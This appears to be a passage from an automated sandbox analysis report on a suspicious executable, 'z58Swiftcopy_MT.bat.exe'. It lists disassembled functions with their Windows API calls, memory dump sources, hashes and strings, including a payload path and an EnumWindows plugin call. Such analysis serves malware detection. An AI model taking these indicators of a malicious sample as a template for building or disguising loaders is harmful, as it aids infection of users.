                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                      • String ID: 0B
                                                                                                                                                                                                                                      • API String ID: 590372296-4132856435
                                                                                                                                                                                                                                      • Opcode ID: 799acff668d1406a393a64cfa932ce4a107f44924d59ebcbf16f3d2c856b27c8
                                                                                                                                                                                                                                      • Instruction ID: 65bb4f05285cabcaf0c1ceede2bf8135bd939e85a5c998f60940a67221f6d910
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 799acff668d1406a393a64cfa932ce4a107f44924d59ebcbf16f3d2c856b27c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8A17A71900208BFDB119FA0DE89EAE7F79FB08355F00403AFA55BA1A0CB754E519F68
                                                                                                                                                                                                                                      Function 00404B3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B55
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B60
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BAA
                                                                                                                                                                                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404BBD
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,00405134), ref: 00404BD6
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BEA
                                                                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BFC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404C12
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C1E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C30
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C33
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C5E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C6A
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404CFF
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404D2A
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D3E
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404D6D
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404D7B
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D8C
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404E89
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404EEE
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F03
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F27
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F47
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F5C
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F6C
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404FE5
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 0040508E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040509D
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050BD
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040510B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405116
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040511D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                                                                      • Opcode ID: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                                                                                                                                                                                                      • Instruction ID: d82d2da19de6c08df5f7af85b096481c441aefc445292f149536e1611d4f21ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21234ef24cb517e62b6e681d72db919925f617bec669e1fe45a086f5b61beedf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 080241B0A00209AFDB209F95DD85AAE7BB5FB84314F10417AF611BA2E1C7799D42CF58
                                                                                                                                                                                                                                      Function 004045CA Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404643
                                                                                                                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 004046F4
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(Call,00420D30), ref: 00404731
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                                                                                                                        • Part of subcall function 00405799: GetDlgItemTextA.USER32(?,?,00000400,00404786), ref: 004057AC
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharNextA.USER32(?,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                                                                                                                                                                                                        • Part of subcall function 00406303: CharPrevA.USER32(?,?,762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(0041FD00,?,?,0000040F,?,0041FD00,0041FD00,?,00000001,0041FD00,?,?,000003FB,?), ref: 0040480D
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404828
                                                                                                                                                                                                                                        • Part of subcall function 00404981: lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                                                                                                                                                                                                        • Part of subcall function 00404981: wsprintfA.USER32 ref: 00404A27
                                                                                                                                                                                                                                        • Part of subcall function 00404981: SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: 0B$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$Call$user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 2624150263-1464366572
                                                                                                                                                                                                                                      • Opcode ID: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                                                                                                                                                                                                      • Instruction ID: 615b1c7bc5a39f2962dd47e2389a1e1cc3dfb76fea7d39b1cb42eedec06edaaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76c1ef681dfc1789dea454b52c729533340df3c35bc87fe95344eb3cb4d70c23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4A19FB1900209ABDB11EFA5CC85AAFB7B8EF85314F10843BF611B62D1D77C89418B69
                                                                                                                                                                                                                                      Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4227406936-0
                                                                                                                                                                                                                                      • Opcode ID: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb5dc2aea9cf7ab25a3b1e4be44dc9197e12157622a09bbe3f88e709afef852
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                                                                                      Function 004020CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00408408,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004083F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne, xrefs: 0040218D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne
                                                                                                                                                                                                                                      • API String ID: 123533781-2316051892
                                                                                                                                                                                                                                      • Opcode ID: 1f4e783d33bd6e9172d284d0e230be815ba95689a56598640df84db978dd7c10
                                                                                                                                                                                                                                      • Instruction ID: a4a7f3c5621d46c7608b395b9069b641d7403675325c7ae40bb0e4cab6624151
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4e783d33bd6e9172d284d0e230be815ba95689a56598640df84db978dd7c10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89512475A00208BFCF10DFE4C988A9DBBB5EF88314F2045AAF915EB2D1DA799941CF54
                                                                                                                                                                                                                                      Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: 8bb92b40096ce253c1feb66c156ee41281b8be3657acaa0f53a495f9db4c8228
                                                                                                                                                                                                                                      • Instruction ID: 0159b05a81fb7445ac67952f267e1ed3d95360429fb03f1bd53dceef05a54f2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bb92b40096ce253c1feb66c156ee41281b8be3657acaa0f53a495f9db4c8228
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF055727041019BC300EBB49948AEEB768DF21324F20017FE285F20C1C7B889469B3A
                                                                                                                                                                                                                                      Function 00403C86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403CDF
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403CF3
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D30
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D4B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403DF9
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403E03
                                                                                                                                                                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
                                                                                                                                                                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403F14
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403F35
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F47
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F62
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F7F
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00403FD4
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00420D30), ref: 00403FE3
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404117
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                                      • String ID: 0B
                                                                                                                                                                                                                                      • API String ID: 184305955-4132856435
                                                                                                                                                                                                                                      • Opcode ID: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                                                                                                                                                                                                      • Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D
                                                                                                                                                                                                                                      Function 004042A3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040432E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404342
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404360
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404371
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404380
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040438F
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00404392
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043A1
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043B6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404418
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 0040441B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404446
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404486
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00404495
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040449E
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004044B4
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004044B7
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                      • String ID: Call$N$nB@
                                                                                                                                                                                                                                      • API String ID: 3103080414-3023683851
                                                                                                                                                                                                                                      • Opcode ID: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                                                                                                                                                                                                      • Instruction ID: d5db58c66581f694922deb7e8fae8f0f3f349f8e9ef4465256bb12a48e84c332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be1686f5ab50b662bbe0d02e149cf8afdcfbb49c1a0c534bd92e439938163a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E61A4B1A40209BFDB109F61DD45F6A7B69FB84714F10803AFB05BA2D1C7B8A951CF98
                                                                                                                                                                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                      Download Yara Rule
